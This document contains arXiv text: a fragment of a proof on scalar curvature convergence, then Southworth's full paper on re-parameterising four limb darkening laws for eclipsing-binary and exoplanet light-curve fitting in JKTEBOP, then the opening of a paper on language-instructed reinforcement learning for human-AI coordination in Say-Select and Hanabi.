\(|g_{i}-g_{0}|_{g_{0}}\leq Ci^{-\frac{1}{2}}\) _in_ \(M\setminus\Omega_{i}\)_,_ 3. \(R_{g_{i}}\geq n(n-1)-Ci^{-\frac{2}{3}}\) _in_ \(M\setminus\Omega_{i}\)_._ Proof.: Utilizing the notation above, we set \(\Omega_{i}=\mathcal{A}_{i}\cup\mathcal{B}_{i}\). Conclusions (1) and (3) follow directly from the proof of Lemma 4.1 and the definition of \(\mathcal{B}_{i}\). Using \(n\geq 3\), Conclusion (2) follows by combining the definition of \(\mathcal{A}_{i}\) with the assumption \(\lambda_{l}\lambda_{j}\geq 1\). In the above setting, we already know that in the limit \(R_{g_{0}}\geq n(n-1)\). We remark that according to the work of R. Bamler and M. Gromov [5, 16] this lower bound on scalar curvature would have been automatically preserved under \(C^{0}\) convergence. Proof of Theorem C.: Fix \(\varepsilon>0\). According to the above proposition we can find a subsequence (which we will not relabel) such that \(|\Omega_{i}|_{g_{i}}\leq\varepsilon 2^{-i}\) and \(g_{i}\) is \(C^{0}\)-close to \(g_{0}\) on \(\Omega_{i}^{c}\). Let us denote with \(\Omega=\bigcup_{i=1}^{\infty}\Omega_{i}\) and note that \(|\Omega|_{g_{0}}\leq|\Omega|_{g_{i}}\leq\varepsilon\). On \(\Omega^{c}\subset S^{n}\), \(g_{i}\) converges to \(g_{0}\) in the \(C^{0}\) sense. **Remark 4.3**.: _It is necessary to pass to a subsequence in Theorem C and there are counterexamples otherwise. To demonstrate this, consider for each \(j\) a metric on the sphere with \(R_{g_{j}}\geq n(n-1)-\frac{1}{j}\), \(g\geq g_{0}\), and containing a spline. This spline can be rotated around construct a new sequence of metrics \(g_{i}\) such that there is no point \(p\in S^{n}\) where \(g_{i}(p)\to g_{0}(p)\) in the \(C^{0}\) sense._
2301.02531
Re-parameterisation of four limb darkening laws and their implementation into the JKTEBOP code
Limb darkening (LD) is typically parameterised using a range of functional "laws" in models of the light curves of eclipsing binary and transiting planetary systems. The two-coefficient LD laws all suffer from a strong correlation between their coefficients, preventing a reliable determination of both coefficients from high-quality light curves. We use numerical simulations to propose re-parameterisations of the quadratic, logarithmic, square-root and cubic LD laws that show much weaker correlations, and implement them into the JKTEBOP code. We recommend that these re-parameterisations are used whenever both LD coefficients are fitted. Conversely, when fitting for only one coefficient, the standard laws should be used to avoid problems with fixing coefficients at poor values. We find that these choices have little effect on the other fitted parameters of a light curve model. We also recommend that the power-2 LD law should be used as default because it provides a good fit to theoretical predictions, and that the quadratic and linear laws should be avoided because they do not.
John Southworth
2023-01-06T14:43:41Z
http://arxiv.org/abs/2301.02531v1
# Re-PARAMETERISATION OF FOUR LIMB DARKENING LAWS AND THEIR IMPLEMENTATION INTO THE JKTEBOP CODE ###### Abstract Limb darkening (LD) is a universal phenomenon which modifies the brightness of stars across their disc. LD results in a wavelength-dependent decrease in brightness from the centre of the observed disc to the limb, and in a steeper drop-off closer to the limb compared to near the centre. It arises because sightlines which enter the surface of the star at an angle ("slant viewing geometry") penetrate less deep into the atmosphere, see cooler plasma than a perpendicular sightline, and so perceive a lower flux. Limb darkening (LD) is typically parameterised using a range of functional 'laws' in models of the light curves of eclipsing binary and transiting planetary systems. The two-coefficient LD laws all suffer from a strong correlation between their coefficients, preventing a reliable determination of both coefficients from high-quality light curves. We use numerical simulations to propose re-parameterisations of the quadratic, logarithmic, square-root and cubic LD laws that show much weaker correlations, and implement them into the jktebop code. We recommend that these re-parameterisations are used whenever both LD coefficients are fitted. Conversely, when fitting for only one coefficient, the standard laws should be used to avoid problems with fixing coefficients at poor values. We find that these choices have little effect on the other fitted parameters of a light curve model. We also recommend that the power-2 LD law should be used as default because it provides a good fit to theoretical predictions, and that the quadratic and linear laws should be avoided because they do not. ## Introduction Limb darkening (LD) is a universal phenomenon which modifies the brightness of stars across their disc. LD results in a wavelength-dependent decrease in brightness from the centre of the observed disc to the limb, and in a steeper drop-off closer to the limb compared to near the centre. It arises because sightlines which enter the surface of the star at an angle ("slant viewing geometry") penetrate less deep into the atmosphere, see cooler plasma than a perpendicular sightline, and so perceive a lower flux. LD was first noticed in our Sun by Luca Valerio in 1612[1], and was first measured by Pierre Bouguer in 1729[2]. It must be accounted for in any observing project which involves spatially resolving a star, specifically interferometry, eclipsing binaries (EBs) and transiting planetary systems (TEPs). All analysis methods that the author is aware of for EBs and TEPs include a treatment of LD in order to properly represent the characteristics of the object(s) being considered. In this work we describe the implementation of multiple LD laws into the jktebop[*] code[3, 4] for modelling the light and radial velocity curves of EBs and TEPs. The novelty of this work lies primarily in the re-parameterisation of the two-coefficient LD laws to mitigate the strong correlations between the two coefficients. We begin with a reminder of the different LD laws in use, present the re-parameterisations we adopt, and conclude with advice on using the LD functionality now included in jktebop. ### Limb darkening laws For the analysis of the light curves of EBs, LD was implemented in the pioneering Russell-Merrill method [5, 6, 7, 8, 9] using the linear law [5, 10]: \[\frac{F(\mu)}{F(1)}=1-u_{\rm lin}(1-\mu)\, \tag{1}\] where \(F(\mu)\) is the flux at position \(\mu=\cos\gamma\) on the stellar disc, \(\gamma\) is the angle between the observer's line of sight and the surface normal, \(F(1)\) is the flux at the centre of the disc, and \(u_{\rm lin}\) is the linear LD coefficient. The strength of the LD is specified by \(u_{\rm lin}\), which is normally between unity (no limb darkening) and zero (surface flux decreases to zero at the limb). The linear LD law has been known for over a century to be an inadequate representation of the solar LD [11, 12, 13, 14] prompting more sophisticated laws to be proposed: the quadratic LD law (Kopal [15]): \[\frac{F(\mu)}{F(1)}=1-u_{\rm quad}(1-\mu)-v_{\rm quad}(1-\mu)^{2}\ \, \tag{2}\] the logarithmic law (Klinglesmith & Sobieski [16]): \[\frac{F(\mu)}{F(1)}=1-u_{\rm log}(1-\mu)-v_{\rm log}\mu\ln\mu\ \, \tag{3}\] the square-root law (Diaz-Cordoves & Gimenez [17]): \[\frac{F(\mu)}{F(1)}=1-u_{\rm sqrt}(1-\mu)-v_{\rm sqrt}(1-\sqrt{\mu})\ \, \tag{4}\] the cubic law (van't Veer [18]): \[\frac{F(\mu)}{F(1)}=1-u_{\rm cub}(1-\mu)-v_{\rm cub}(1-\mu)^{3}\ \, \tag{5}\] the power-2 law (Hestroffer [19]): \[\frac{F(\mu)}{F(1)}=1-c(1-\mu^{\alpha})\ \, \tag{6}\] and the four-parameter law proposed by Claret [20]: \[\frac{F(\mu)}{F(1)}=1-\sum_{n=1}^{4}u_{n}(1-\mu^{n/2})\ . \tag{7}\] The ebop code[21, 22], on which jktebop is based, used the linear LD law. Diaz-Cordoves & Gimenez[17] and Gimenez & Diaz-Cordoves[23] modified ebop to include the quadratic and square-root LD laws. The current author subsequently added these and the logarithmic, cubic and four-parameter laws into jktebop (versions 12, 15 and 31). We have now added the power-2 law (jktebop version 43) which means that all the laws given above are now implemented in jktebop. The cubic law was included specifically because it was expected that the greater functional difference between the two terms (compared to the quadratic law) would make the two coefficients less correlated; it is shown below that this is indeed the case. It is possible within jktebop to use different LD laws for the two stars, with the exception of the four-parameter law. ### Review of published re-parameterisations of the LD laws Our experience of using the LD laws in jktebop for a wide range of EBs and TEPs is that: the linear law is adequate for most ground-based data but not for light curves from space missions such as _Kepler_, _CoRoT_ and TESS; results from the two-parameter laws are typically in excellent agreement; one should fit for one of the two LD coefficients when possible because theoretical predictions are imperfect; fitting for both LD coefficients in the two-coefficient laws is not recommended because they can be severely correlated. Strong correlations are a particular issue for Markov chain Monte Carlo (MCMC) codes as they cause a long autocorrelation length and thus decrease the number of independent samples in the Markov chains. Support for these statements can be found in correlation plots[24, 25] and supplementary material for the _Homgeneous Studies_ publications[25, 26, 27, 28]. The strong correlations have also been noticed by other researchers, e.g. refs.[29] and[30]. The correlations could be decreased by changing the parameterisation of the LD laws, and a range of re-parameterisations have been proposed for the quadratic law. Brown et al.[31] fitted for the sum and difference of the LD coefficients: \[u^{\prime}=u_{\rm quad}+v_{\rm quad} \tag{8}\] \[v^{\prime}=u_{\rm quad}-v_{\rm quad} \tag{9}\] Holman et al.[32] used another: \[u^{\prime}=2\,u_{\rm quad}+v_{\rm quad} \tag{10}\] \[v^{\prime}=u_{\rm quad}-2\,v_{\rm quad} \tag{11}\] and Pal[30] generalised these to \[u^{\prime}=u_{\rm quad}\sin\theta-v_{\rm quad}\cos\theta \tag{12}\] \[v^{\prime}=u_{\rm quad}\sin\theta+v_{\rm quad}\cos\theta \tag{13}\] where \(\theta\) depends on the properties of the system being studied but is usually between \(35^{\circ}\) and \(40^{\circ}\). Kipping[33] has explored these in detail, and Howarth[34] has discussed the comparison between observed and theoretical LD coefficients. Maxted[35] proposed a re-parameterisation of the power-2 LD law to depend on the coefficients \(h_{1}\) and \(h_{2}\) where \[h_{1}=\frac{F(0.5)}{F(1)}=1-c\,(1-2^{-\alpha}) \tag{14}\] and \[h_{2}=\frac{F(0.5)-F(0)}{F(1)}=c\,2^{-\alpha} \tag{15}\] and \(h_{1}\) and \(h_{2}\) are only weakly correlated (see also Short et al.[36]). We are not aware of proposed re-parameterisations for any of the other laws, a point also noted by Czismadia[37]. ### Data for numerical experiments It is desirable to avoid strong correlations between parameters when fitting the light curves of EBs and TEPs. We therefore chose to re-parameterise the two-parameter LD laws with coefficients that are less strongly correlated. As multiple differing options have been published for the quadratic law, and none for any of the other laws (except power-2), we decided to determine our own. The most straightforward way to do this is via numerical experiments. We identified a set of five EBs and TEPs with a variety of properties and for which excellent light curves exist. The rationale for these choices is that we expected the correlations between LD coefficients to depend on the physical attributes of a given system so needed to include objects with a range of characteristics, and that very high-quality photometry is needed to fit for both LD coefficients in a given system. The first object we analysed was the EB IT Cas, which was chosen because it shows deep V-shaped eclipses which arise from two very similar stars with an orbital inclination near \(90^{\circ}\), and thus should sample the full range of \(\mu\) values on the stellar discs. For this we used the Simple Aperture Photometry (SAP) from sector 17 of the Transiting Exoplanet Survey Satellite (TESS) downloaded from the Mikulski Archive for Space Telescopes (MAST1). We used only data with a QUALITY flag of zero, ignored the data errors as they were too small, and rejected all data more than one eclipse duration from the midpoint of an eclipse in order to save computing time. A detailed analysis of this system is in preparation and will be presented in due course as part of the _Rediscussion of Eclipsing Binaries_ project[38]. Footnote 1: [https://mast.stsci.edu/portal/Mashup/Clients/Mast/Portal.html](https://mast.stsci.edu/portal/Mashup/Clients/Mast/Portal.html) For our second object we chose WASP-50, a TEP for which an extremely high-quality transit light curve is available from a ground-based telescope[39]. These data proved to be useful but of insufficient quality to reliably measure two LD coefficients. We therefore chose a third object, the TEP system HAT-P-7[40] for which an extraordinarily good light curve is available from the _Kepler_ satellite[41]. We used the same data as in Southworth[27], which comprise the first 59 transits observed, all in short cadence mode[42]. We also added a fourth object, the totally-eclipsing binary YZ Cas[43], for which we used the sector 19 data from TESS. Finally, after inspection of the preliminary results, we added WW Aur[44] as it shows deep V-shaped eclipses similar to those of IT Cas but has a circular orbit. For WW Aur we used the sector 45 data from TESS. For both objects the TESS data were prepared in the same way as for IT Cas. The light curves of the five objects are shown in Figs. 1 and 2. We would have liked to extend this to stars hotter than YZ Cas A but were unable to identify a suitable candidate: all options we explored had either shallow eclipses, large fractional radii, pulsations, or no high-quality light curve. The light curve of each object was modelled using jktebop and a two-parameter LD law, with both LD coefficients fitted. Once a good fit was obtained, we ran a set of 1000 Monte Carlo simulations[45, 25], which comprised the generation and then least-squares fit of 1000 synthetic datasets with the same timestamps as the original data and brightness measurements taken from the original best-fitting Figure 1: TESS short-cadence SAP photometry of the three EBs analysed in the current work. The primary eclipses are shown in the left panels and the secondary eclipses in the right panels. The names are labelled on the panels. model with Gaussian noise applied. This was performed for the quadratic, logarithmic, square-root and cubic LD laws. We did not consider the linear LD law, because it only has one coefficient so is not affected by correlations between coefficients, or the power-2 law, as the \(h_{1}\) and \(h_{2}\) approach was judged to be already satisfactory. Conversely, the four-parameter law exhibits such strong correlations between its coefficients that we considered it to be a lost cause so made no attempt to re-parameterise it. \begin{table} \begin{tabular}{l c c c c} _Object_ & _quadratic law_ & _logarithmic law_ & _square-root law_ & _cubic law_ \\ IT Cas & \(-0.982\) & \(+0.998\) & \(-0.999\) & \(-0.952\) \\ WASP-50 & \(-0.951\) & \(+0.994\) & \(-0.996\) & \(-0.605\) \\ HAT-P-7 & \(-0.992\) & \(+0.992\) & \(-0.999\) & \(-0.973\) \\ YZ Cas & \(-0.978\) & \(+0.987\) & \(-0.999\) & \(-0.914\) \\ WW Aur & \(-0.995\) & \(+0.997\) & \(-0.999\) & \(-0.985\) \\ \end{tabular} \end{table} Table 1: _Linear Pearson correlation coefficients between the \(u\) and \(v\) coefficients of the two-parameter LD laws, assessed using Monte Carlo simulations as implemented in jktebop, for each of the five objects included in the numerical experimentation._ Figure 2: Light curves of the two TEPs analysed in the current work from the New Technology Telescope (WASP-50) and _Kepler_ (HAT-P-7). #### 3.2.2 New re-parameterisations We first assessed the linear Pearson correlation between the two LD coefficients in each Monte Carlo simulation, using the correlate function in IDL2. The results are given in Table 1 and support several conclusions. First, the correlations between \(u\) and \(v\) are in general horrendous. Second, we notice that the correlations are at their worst when the data are of the highest quality. Third, the coefficients of the square-root law exhibit almost perfect correlations so should never be fitted together. Fourth, the coefficients of the cubic LD law have the lowest correlations, supporting the expectation mentioned above. Footnote 2: [http://www.harrisgeospatial.com/SoftwareTechnology/IDL.aspx](http://www.harrisgeospatial.com/SoftwareTechnology/IDL.aspx) We next sought alternative parameterisations that would reduce these correlations. We chose a functional form that is similar to that of Pal30 but simpler: Footnote 3: [http://www.harrisgeospatial.com/SoftwareTechnology/IDL.aspx](http://www.harrisgeospatial.com/SoftwareTechnology/IDL.aspx) \[u^{\prime}=u+x\,v \tag{16}\] \[v^{\prime}=u-x\,v \tag{17}\] where the quantity \(x\) can be chosen to minimise the correlation between \(u^{\prime}\) and \(v^{\prime}\) for each LD law. The implementation of this in jktebop was done by modifying the input and output sections but converting the LD to the original parameterisations when calculating a model datapoint. This meant that we needed only the inverse transforms, which can easily be shown to be: \[u=\frac{u^{\prime}+v^{\prime}}{2} \tag{18}\] \[v=\frac{u^{\prime}-v^{\prime}}{2x} \tag{19}\] independently of the LD law. We then determined the value of \(x\), for each LD law and for each object, that minimised the correlation between \(u^{\prime}\) and \(v^{\prime}\). This was done by manual iteration and was restricted to two significant figures in \(x\) both for convenience and to avoid unnecessary precision. These values are given in Table 2 and show that the best value of \(x\) depends on both the object and the LD law, as expected. The results are highly consistent, with the exception of IT Cas for which significantly \begin{table} \begin{tabular}{l c c c c} _Object_ & _quadratic law_ & _logarithmic law_ & _square-root law_ & _cubic law_ \\ IT Cas & 0.44 & 0.75 & 0.57 & 0.19 \\ WASP-50 & 0.59 & 0.57 & 0.51 & 0.29 \\ HAT-P-7 & 0.62 & 0.60 & 0.62 & 0.39 \\ YZ Cas & 0.63 & 0.64 & 0.60 & 0.33 \\ WW Aur & 0.58 & 0.62 & 0.62 & 0.35 \\ Adopted value & 0.6 & 0.6 & 0.6 & 0.3 \\ \end{tabular} \end{table} Table 2: _Values of x which minimise the correlation between \(u^{\prime}\) and \(v^{\prime}\), for each LD law and each object studied._ different \(x\) values are found in some cases. A plausible explanation for this is that IT Cas is the only object with an eccentric orbit, and the inclusion of \(e\sin\omega\) as a fitted parameter has modified the correlations between the LD coefficients. However, an exploratory Monte Carlo simulation with \(e\sin\omega\) fixed showed the same result so this supposition was not confirmed. Given this relatively good consistency in \(x\), we chose suitable values for implementation in jktebop for general use: 0.3 for the cubic law and 0.6 for the other three laws. For clarity, here are the revised versions of the LD laws we propose: \[u^{\prime}_{\rm quad}=u_{\rm quad}+0.6\,v_{\rm quad} \tag{20}\] \[v^{\prime}_{\rm quad}=u_{\rm quad}-0.6\,v_{\rm quad} \tag{21}\] for the quadratic law, \[u^{\prime}_{\rm log}=u_{\rm log}+0.6\,v_{\rm log} \tag{22}\] \[v^{\prime}_{\rm log}=u_{\rm log}-0.6\,v_{\rm log} \tag{23}\] for the logarithmic law, \[u^{\prime}_{\rm sqrt}=u_{\rm sqrt}+0.6\,v_{\rm sqrt} \tag{24}\] \[v^{\prime}_{\rm sqrt}=u_{\rm sqrt}-0.6\,v_{\rm sqrt} \tag{25}\] for the square-root law, and \[u^{\prime}_{\rm cub}=u_{\rm cub}+0.3\,v_{\rm cub} \tag{26}\] \[v^{\prime}_{\rm cub}=u_{\rm cub}-0.3\,v_{\rm cub} \tag{27}\] for the cubic law. We assessed the correlation between \(u^{\prime}\) and \(v^{\prime}\) for each of these laws and for each of the five objects to gauge the improvement brought by the revised laws. These are given in Table 3 and show a clear improvement in all cases. There are nevertheless still some strong correlations, particularly for the logarithmic and square-root laws. We recommend that these laws are not used when attempting to fit both coefficients of a two-parameter LD law. As an example, in Figs. 3 and 4 we show scatter plots of the Monte Carlo simulation output for WW Aur, for the LD laws in their original form, for the lowest correlation for this object, and for the recommended re-parameterisations. \begin{table} \begin{tabular}{l c c c c} _Object_ & _quadratic law_ & _logarithmic law_ & _square-root law_ & _cubic law_ \\ IT Cas & \(-0.860\) & \(+0.969\) & \(-0.888\) & \(-0.842\) \\ WASP-50 & \(-0.034\) & \(-0.375\) & \(-0.890\) & \(-0.028\) \\ HAT-P-7 & \(+0.206\) & \(-0.022\) & \(+0.704\) & \(-0.222\) \\ YZ Cas & \(-0.207\) & \(+0.383\) & \(-0.064\) & \(-0.745\) \\ WW Aur & \(-0.363\) & \(+0.374\) & \(-0.711\) & \(-0.688\) \\ \end{tabular} \end{table} Table 3: _Linear Pearson correlation coefficients between \(u^{\prime}\) and \(v^{\prime}\) in our new LD law parameterisations, calculated for each of the five objects included in the numerical experimentation using Monte Carlo simulations._ Several published re-parameterisations of the quadratic LD law [31; 32; 30] were quoted above. We checked these against each of our five objects (allowing for values between \(35^{\circ}\) and \(40^{\circ}\) for the functional form proposed by Pal [30]) and found that they all yielded significantly stronger correlations than the re-parameterisations proposed in the current work. Finally, we did not attempt to compare the coefficients to theory in order to avoid "mission creep". Figure 3: Scatter plots of the LD coefficients for the quadratic and logarithmic laws obtained from fitting the light curve of WW Aur and then performing 1000 Monte Carlo simulations. The correlation coefficient is printed in each panel. _Testing the new LD laws_ Now we had re-parameterisations of the LD laws and implemented them into jktebop, we proceeded to test the code and assess the effect of the revised LD laws. To limit the computational load of this work we analysed only one object, WW Aur, and fitted only the data near eclipse in the first half of the light curve from TESS sector 45. Best fits and 1000 Monte Carlo simulations were performed for the linear LD law, for all two-parameter laws in their original form, for the re-parameterisations presented here, and for the \(h_{1}\) and \(h_{2}\) approach for the power-2 law. Initial or fixed LD coefficients were set to values for the Cousins Figure 4: As Fig. 3 but for the square-root and cubic LD laws. \(R\) passband from Claret & Hauschildt [46], with the exception of the power-2 law for which we used the TESS passband predictions from Claret & Southworth [47]. We also ran two fits using the four-parameter LD law: one with coefficient \(u_{2}\) fitted and one with \(u_{2}\) and \(u_{4}\) fitted. The values of the fixed coefficients were taken from Claret [48]. We report only the most relevant results from this work: the r.m.s. scatter around the best fit, the fractional radii (\(r_{\rm A}\) and \(r_{\rm B}\)), and the orbital inclination (\(i\)). These are given in Table 4 with errorbars assessed using the Monte Carlo simulations. The errorbars are not true uncertainties, as Monte Carlo simulations are only one of the tools typically deployed in our error analyses [49], and are almost certainly too small [50]. Extensive comparisons between the results from different LD laws can also be found in the supplementary material to our _Homogeneous Studies_ papers [25, 26, 27, 28] for 94 TEPs. Based on experience, Table 4 and the _Homogeneous Studies_ supplementary material, we draw the following conclusions. First, the linear LD law is too simplistic and gives slightly different results to those from all other LD laws. \begin{table} \begin{tabular}{l c c c c c} _LD approach_ & \(N_{\rm cof}\) & rms (mmag) & \(r_{\rm A}\) & \(r_{\rm B}\) & \(i\) (\({}^{\circ}\)) \\ Linear law & 1 & 0.350 & 0.15958 (4) & 0.15121 (4) & 87.550 (2) \\ Quadratic law & 1 & 0.343 & 0.15973 (4) & 0.15148 (4) & 87.497 (2) \\ Logarithmic law & 1 & 0.352 & 0.15957 (4) & 0.15118 (4) & 87.555 (2) \\ Square-root law & 1 & 0.341 & 0.15973 (4) & 0.15140 (4) & 87.508 (2) \\ Cubic law & 1 & 0.341 & 0.15973 (4) & 0.15138 (4) & 87.510 (2) \\ Power-2 law & 1 & 0.341 & 0.15971 (4) & 0.15138 (4) & 87.512 (2) \\ Quadratic re-par & 1 & 0.342 & 0.15972 (4) & 0.15146 (4) & 87.501 (2) \\ Logarithmic re-par & 1 & 0.647 & 0.16019 (7) & 0.15254 (7) & 87.300 (4) \\ Square-root re-par & 1 & 0.341 & 0.15973 (4) & 0.15140 (4) & 87.508 (2) \\ Cubic re-par & 1 & 0.348 & 0.15960 (4) & 0.15124 (4) & 87.543 (2) \\ Power-2 (\(h_{1}\) and \(h_{2}\)) & 1 & 0.342 & 0.15970 (4) & 0.15136 (4) & 87.517 (2) \\ Quadratic law & 2 & 0.342 & 0.15969 (4) & 0.15141 (4) & 87.510 (3) \\ Logarithmic law & 2 & 0.341 & 0.15972 (4) & 0.15141 (4) & 87.508 (3) \\ Square-root law & 2 & 0.341 & 0.15973 (4) & 0.15140 (4) & 87.508 (3) \\ Cubic law & 2 & 0.341 & 0.15974 (4) & 0.15139 (4) & 87.507 (3) \\ Power-2 law & 2 & 0.341 & 0.15974 (4) & 0.15141 (4) & 87.507 (3) \\ Quadratic re-par & 2 & 0.342 & 0.15969 (4) & 0.15141 (5) & 87.510 (3) \\ Logarithmic re-par & 2 & 0.341 & 0.15972 (4) & 0.15141 (4) & 87.508 (3) \\ Square-root re-par & 2 & 0.341 & 0.15973 (4) & 0.15140 (5) & 87.508 (3) \\ Cubic re-par & 2 & 0.341 & 0.15973 (4) & 0.15140 (4) & 87.508 (3) \\ Power-2 (\(h_{1}\) and \(h_{2}\)) & 2 & 0.341 & 0.15974 (4) & 0.15141 (5) & 87.507 (3) \\ Four-parameter & 1 & 0.341 & 0.15970 (4) & 0.15136 (4) & 87.517 (2) \\ Four-parameter & 2 & 0.341 & 0.15972 (4) & 0.15139 (4) & 87.509 (3) \\ \end{tabular} \end{table} Table 4: _Selected results from fitting the TESS light curve of WW Aur with one or two LD coefficients fitted, for all possible versions of the one- and two-parameter laws. \(N_{\rm cof}\) is the number of LD coefficients fitted. The bracketed quantities indicate uncertainties in the final digit of the preceding values_ It should not be used except for convenience in cases where the data quality is low. Second, the re-parameterised laws give results that are consistent with the original laws. Third, fitting for both LD coefficients yielded comparable results to fitting for one coefficient in the case of WW Aur, for which the data are of extremely high quality. Fourth, the anomalously poor solution in Table 4 for the re-parameterised square-root law suggests that the re-parameterised laws risk giving bad results if only one LD coefficient is fitted and the other coefficient is fixed at a bad value. ### Summary A profusion of LD laws have been proposed, many of which have two coefficients. All of these suffer from strong correlations between the two coefficients which hinders the modelling process of observed light curves when both coefficients are fitted parameters. We have proposed a re-parameterisation of the quadratic, logarithmic, square-root and cubic laws and performed numerical simulations to calibrate the re-parameterisations. This was done considering three EBs and two TEPs with a variety of light curve shapes. We give the following recommendations: 1. Light curves of low quality can be modelled using either the linear law for simplicity, or one of the two-parameter laws with one or both coefficients fixed. 2. Light curves of medium quality should be modelled using one of the standard two-parameter laws, with one coefficient fitted and one fixed. 3. Light curves of high quality should be modelled including two LD coefficients as fitted parameters. In this case the re-parameterised laws should be used, to avoid the strong correlations found with the standard two-parameter laws. This is particularly important for sampling algorithms such as Markov chain Monte Carlo (MCMC), to avoid long autocorrelation lengths in the Markov chains. 4. If you are unsure whether a light curve is of low, medium or high quality, you should try two or all three options and decide which is best based on the values of and uncertainties in the fitted LD coefficients (and other system parameters). 5. The linear LD law should be avoided when performing any detailed analysis. 6. The quadratic LD law should be avoided as it does not match theoretical LD predictions well[47, 51]. 7. The power-2 LD law should be adopted as the default law because it _does_ match theoretical LD predictions well[35, 47, 52]. 8. The four two-coefficient LD laws give highly consistent results when treated in the same way, so the choice between them is not important. 9. The best re-parameterisation of a given LD law varies slightly between light curves. If this is an issue, or if you want to avoid parameter correlations as much as possible, you should use principal component analysis (PCA) to orthogonalise the model parameters in the course of obtaining a least-squares solution to a given light curve. All LD laws and re-parameterisations have been implemented in version 43 of the jktebop code, which is freely available for download from the author's website. The choice of which LD function to adopt is left to the user. ### Acknowledgements We thank Drs. Pierre Maxted and Antonio Claret for comments on a draft of this manuscript. This paper includes data collected by the _Kepler_ and TESS missions and obtained from the MAST data archive at the Space Telescope Science Institute (STScI). Funding for the _Kepler_ and TESS missions is provided by the NASA's Science Mission Directorate. STScI is operated by the Association of Universities for Research in Astronomy, Inc., under NASA contract NAS 5-26555. The following resources were used in the course of this work: the NASA Astrophysics Data System; the SIMBAD database operated at CDS, Strasbourg, France; and the ar\(\chi\)iv scientific paper preprint service operated by Cornell University.
2304.07297
Language Instructed Reinforcement Learning for Human-AI Coordination
One of the fundamental quests of AI is to produce agents that coordinate well with humans. This problem is challenging, especially in domains that lack high quality human behavioral data, because multi-agent reinforcement learning (RL) often converges to different equilibria from the ones that humans prefer. We propose a novel framework, instructRL, that enables humans to specify what kind of strategies they expect from their AI partners through natural language instructions. We use pretrained large language models to generate a prior policy conditioned on the human instruction and use the prior to regularize the RL objective. This leads to the RL agent converging to equilibria that are aligned with human preferences. We show that instructRL converges to human-like policies that satisfy the given instructions in a proof-of-concept environment as well as the challenging Hanabi benchmark. Finally, we show that knowing the language instruction significantly boosts human-AI coordination performance in human evaluations in Hanabi.
Hengyuan Hu, Dorsa Sadigh
2023-04-13T04:47:31Z
http://arxiv.org/abs/2304.07297v2
# Language Instructed Reinforcement Learning for Human-AI Coordination ###### Abstract One of the fundamental quests of AI is to produce agents that coordinate well with humans. This problem is challenging, especially in domains that lack high quality human behavioral data, because multi-agent reinforcement learning (RL) often converges to different equilibria from the ones that humans prefer. We propose a novel framework, _instructRL_, that enables humans to specify what kind of strategies they expect from their AI partners through natural language instructions. We use pretrained large language models to generate a prior policy conditioned on the human instruction and use the prior to regularize the RL objective. This leads to the RL agent converging to equilibria that are aligned with human preferences. We show that instructRL converges to human-like policies that satisfy the given instructions in a proof-of-concept environment as well as the challenging Hanabi benchmark. Finally, we show that knowing the language instruction significantly boosts human-AI coordination performance through human evaluations in Hanabi. Machine Learning, Reinforcement Learning, Human-AI Coordination ## 1 Introduction One of the most fundamental yet challenging goals of AI is to create agents that can coordinate with humans in human-AI hybrid environments. In domains where abundant, high quality human behavioral data is available, such as Diplomacy (FAIR et al., 2022), we can expect AI agents to achieve human level performance and coordinate effectively with humans. However, these methods are limited to settings where high quality human data is readily available. Without access to human data, we have to rely on techniques such as reinforcement learning (RL) algorithms to learn strong policies in multi-agent settings. However, the main challenge in leveraging RL for human-AI coordination is the existence of multiple, mutually incompatible equilibrium policies in a multi-agent system and the fact that without guidance RL agents can converge to any of them (Shih et al., 2021; Hu et al., 2020). Here _equilibrium_ policies refer to optimal or near-optimal joint policies in multi-agent environments. In practice, humans often prefer specific subsets of policies -- particular equilibria in multi-agent games -- that align well with our capabilities and common sense, while reinforcement learning policies that do not integrate any forms of human priors often converge to policies that are hard for humans to collaborate with (Bakhtin et al., 2022; Carroll et al., 2019). Let us consider a simple collaborative game as our running example. Alice and Bob are collaborating with each other on a game "Say-Select" as shown in Figure 1. There are 5 balls in front of Alice and Bob. A random number of them are assigned with +1 reward and the remaining ones are assigned with -1 reward. Alice (left) can see the values of the balls while Bob (right, blind-folded) cannot. They need to collaborate to collect rewards. Alice can refer to any of the balls by communicating a number from 1 to 5 to Bob. Bob can either pick up a ball or quit the game. After collecting the reward associated with the ball, the ball is re-assigned with -1 reward and put back. The game keeps running until Bob quits. It is easy to see that from RL algorithms' perspective, there are numerous equally optimal joint policies that achieves perfect results by learning an arbitrary mapping from Alice's past action sequences to Bob's decision. However, it is unclear how existing RL algorithms can reliably produce the policies that are most natural to human. For example, a natural policy is one shown in Figure 1, where when Alice communicates any number \(x\), Bob picks up that ball, and if Alice communicates \(x\) twice in a row, Bob should quit. A popular line of research attempts to address this problem by first producing a diverse set of policies and then train a common best response strategy that may generalize to any humans partner (Cui et al., 2023; Lupu et al., 2021; Charakorn et al., 2022). These methods implicitly require the underlying RL algorithm to generate policies near the equilibria that humans prefer, which by itself is challenging and problem dependent. They also have much higher computational cost in order to produce enough policies to facilitate generalization. best response trained against all possible optimal policies still needs to spend many episodes exploring and identifying its partner's policy when paired with a human. Meanwhile, humans may also adjust their policy in parallel as they try to understand and adapt to the best response, which makes the problem more complicated. Our work seeks to address this challenge based on two key observations. First, humans can better understand and coordinate with a policy if it can concisely be summarized in natural language. Second, in most real world coordination scenarios, humans talk to each other or even negotiate to achieve some agreements on how they should collaborate, i.e., what conventions or equilibrium to follow. For example, in Say-Select, a human can just tell the RL algorithm to produce joint policies _where Bob selects the same number as Alice does_, eliminating coordination overhead when deployed to play with the human. These two important aspects have not been considered in the existing multi-agent reinforcement learning (MARL) methods and we aim to incorporate them for the goal of guiding RL agents towards more human-like policies. In this paper, we propose a novel framework for human-AI coordination where the human can provide high-level natural language instructions to the AI partner as additional specification so that the agent learns to coordinate with the human in ways that match the human's expectation. This would guide the AI agent to follow human's instructions during RL training and agree on a specific equilibrium to converge to. The key idea of our approach _instruct-RL_ is to leverage large language models (LLMs) (Brown et al., 2020) to regularize multi-agent RL training process based on the provided human instructions. We first construct a prior policy by querying large language models (LLMs) given the instructions and short descriptions of the current observation.Then we use the LLM prior to regularize an RL algorithm such as Q-learning (Mnih et al., 2015) or PPO (Schulman et al., 2017) so that the converged equilibrium satisfies the instructions. We initially evaluate our method in the purposely designed Say-Select game discussed above, where we show that our method learns intuitive, human-compatible policies as instructed by the language instructions. Then, we evaluate our method in the large scale Hanabi benchmark (Bard et al., 2020). We show that we can obtain equally strong but qualitatively different policies given different instructions and humans can better coordinate with the AI agents when they know the language instructions that the agents follow. ## 2 Related Work **Language and Human Inductive Bias:** Our research is closely related to the works that 